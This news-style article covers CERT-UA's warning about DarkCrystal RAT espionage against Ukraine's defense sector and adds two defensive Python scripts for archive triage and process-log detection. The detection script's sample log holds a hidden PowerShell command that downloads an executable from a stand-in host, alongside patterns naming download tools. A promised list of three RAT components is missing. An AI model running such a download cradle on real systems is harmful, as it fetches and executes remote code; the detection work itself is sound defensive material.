CERT-UA Warns of Cyber Espionage Against Ukrainian Defense Industry

The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a warning about a sophisticated cyber espionage campaign targeting the Ukrainian defense industry, including defense-industrial complex enterprises and representatives of the Defense Forces. The campaign uses the Dark Crystal RAT (DCRat), a highly modular and customizable malware tool.

In March 2025, threat actors distributed archives through Signal messages. Each archive contained a fake PDF report alongside DarkTortilla malware, a launcher that decrypts and runs the DCRat remote-access tool. CERT-UA experts noted that some of the messages were sent from already compromised contacts, which lends them credibility with recipients.
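A defender-side check for this delivery method is to triage an archive attachment by the content of its members rather than by their names, since an executable can be given a document-like name or icon. The following is an added example, not CERT-UA's code or tooling. It uses Python's standard `zipfile` module with a constructed in-memory ZIP (the campaign used archives in general; the same content check applies to RAR archives via a third-party reader such as `rarfile`). The sample file names and contents are constructed for the illustration.

```python
"""Flag archive members whose bytes are a Windows executable (PE 'MZ' header),
especially when the file name claims to be a document.
Added example; the archive below is constructed in memory so the script runs offline."""
import io
import zipfile

PE_MAGIC = b"MZ"
PDF_MAGIC = b"%PDF"
# Extensions an attacker might borrow to make a dropped executable look harmless.
DOCUMENT_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def classify_member(name: str, head: bytes) -> str:
    """Return a verdict for one archive member based on its leading bytes."""
    lowered = name.lower()
    if head.startswith(PE_MAGIC):
        # A PE file in a "report" archive is suspicious on its own; a document-like
        # name or a double extension such as report.pdf.exe makes it more so.
        if lowered.endswith(DOCUMENT_EXTENSIONS) or ".pdf." in lowered:
            return "executable-disguised-as-document"
        return "executable"
    if head.startswith(PDF_MAGIC):
        return "pdf"
    return "other"


def triage_archive(data: bytes) -> dict[str, str]:
    """Map every file member of a ZIP archive to a verdict; directories are skipped."""
    verdicts: dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)  # only the magic bytes are needed for the verdict
            verdicts[info.filename] = classify_member(info.filename, head)
    return verdicts


def build_sample_archive() -> bytes:
    """Constructed sample: a genuine PDF next to a PE renamed to look like the report."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4\n% constructed sample document\n")
        zf.writestr("report.pdf.exe", b"MZ" + b"\x00" * 62)  # minimal fake PE header
        zf.writestr("notes.txt", b"plain text, nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for member, verdict in triage_archive(build_sample_archive()).items():
        print(f"{member}: {verdict}")
```

Run the script and the PE member is reported as `executable-disguised-as-document` while the real PDF passes; the point is that the verdict comes from the bytes, so renaming the payload does not help the attacker.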

The use of popular instant messaging apps on both mobile and desktop devices has broadened the attack surface, creating uncontrolled information exchange channels that bypass security measures. The Dark Crystal RAT first appeared in the threat landscape in 2018 but was redesigned and relaunched in 2019.

DCRat is written in .NET and features a modular structure, allowing affiliates to develop their own plugins using DCRat Studio, an integrated development environment (IDE). This modular architecture enables the malware to extend its functionalities for multiple malicious purposes, including surveillance, reconnaissance, information theft, DDoS attacks, and arbitrary code execution.

The Dark Crystal RAT consists of three components:

In June 2022, CERT-UA warned of an earlier campaign that targeted Ukrainian telecommunications operators with the same DarkCrystal RAT. The malspam messages used the subject “Free primary legal aid” and carried a password-protected attachment named “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar.”

The RAR archive analyzed by CERT-UA contained the document “Algorithm_LegalAid.xlsm.” Once opened with macros enabled, it executed a PowerShell command that downloaded and ran the .NET bootloader “MSCommondll.exe,” which in turn downloaded and ran DarkCrystal RAT.
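The macro-to-PowerShell-to-bootloader chain in the June 2022 campaign is the kind of sequence that process-creation telemetry can catch even when the payload hashes are unknown. The following is an added example, not CERT-UA's detection content. The tab-separated log format, field layout, timestamps, user name and URL are constructed for the illustration; the file names Algorithm_LegalAid.xlsm and MSCommondll.exe come from the advisory above. It scores individual events (Office spawning a script host, a PowerShell download cradle, evasion flags, PowerShell launching an executable from a user-writable path) and then checks whether the three stages appear in order.

```python
"""Score process-creation events for the macro -> PowerShell download -> dropped
executable chain. Added example; the log format and sample lines are constructed."""
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
DOWNLOAD_CRADLE = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient|bitsadmin)",
    re.IGNORECASE)
EVASION_FLAGS = re.compile(
    r"(^|\s)(-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(nc|ncodedcommand)?\s)", re.IGNORECASE)

# Constructed telemetry: timestamp, parent image, image, command line (tab separated).
SAMPLE_LOG = (
    "2022-06-24T09:12:01Z\tC:\\Windows\\explorer.exe\t"
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\t"
    "\"EXCEL.EXE\" C:\\Users\\user\\Downloads\\Algorithm_LegalAid.xlsm\n"
    "2022-06-24T09:12:07Z\tC:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\t"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell.exe -w hidden -nop -c \"(New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/x','C:\\Users\\user\\AppData\\Local\\Temp\\MSCommondll.exe')\"\n"
    "2022-06-24T09:12:09Z\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "C:\\Users\\user\\AppData\\Local\\Temp\\MSCommondll.exe\tMSCommondll.exe\n"
    "2022-06-24T09:15:00Z\tC:\\Windows\\explorer.exe\t"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -c Get-Date\n"
)


def parse_event(line: str) -> dict:
    """Split one log line; image names are lower-cased basenames, paths kept for location checks."""
    ts, parent, image, cmdline = line.rstrip("\n").split("\t", 3)
    return {
        "ts": ts,
        "parent": parent.rsplit("\\", 1)[-1].lower(),
        "image": image.rsplit("\\", 1)[-1].lower(),
        "image_path": image.lower(),
        "cmdline": cmdline,
    }


def score_event(ev: dict) -> list[str]:
    """Return the list of suspicious traits found in a single process-creation event."""
    reasons = []
    parent, image, cmd = ev["parent"], ev["image"], ev["cmdline"]
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")      # macro launched a script host
    if image in POWERSHELL:
        if DOWNLOAD_CRADLE.search(cmd):
            reasons.append("download-cradle")              # fetches a second stage
        if EVASION_FLAGS.search(cmd):
            reasons.append("evasion-flags")                # hidden window / no profile / encoded
    if (parent in POWERSHELL and image.endswith(".exe") and image not in SCRIPT_HOSTS
            and any(p in ev["image_path"] for p in USER_WRITABLE)):
        reasons.append("script-host-launched-exe-from-user-path")  # dropped bootloader runs
    return reasons


def detect(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Return (timestamp, image, reasons) for every event that scored at least one trait."""
    events = [parse_event(line) for line in log_text.splitlines() if line.strip()]
    scored = [(ev["ts"], ev["image"], score_event(ev)) for ev in events]
    return [item for item in scored if item[2]]


def chain_detected(log_text: str) -> bool:
    """True when all three stages of the chain appear in chronological order."""
    stages = ["office-spawned-script-host", "download-cradle",
              "script-host-launched-exe-from-user-path"]
    seen = 0
    for _, _, reasons in detect(log_text):
        while seen < len(stages) and stages[seen] in reasons:
            seen += 1
    return seen == len(stages)


if __name__ == "__main__":
    for ts, image, reasons in detect(SAMPLE_LOG):
        print(ts, image, ", ".join(reasons))
    print("full chain:", chain_detected(SAMPLE_LOG))
```

On the sample log the benign `Get-Date` invocation scores nothing, the Excel-spawned PowerShell event scores three traits, and the dropped executable scores the final stage, so `chain_detected` returns True. In a real deployment the same scoring would run over Sysmon Event ID 1 or EDR process-start records, with the stage ordering bounded by a time window.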

CERT-UA has published Indicators of Compromise (IoCs) for the ongoing campaign. The Ukrainian government experts urge users to remain vigilant and implement robust security measures to protect themselves against this sophisticated threat.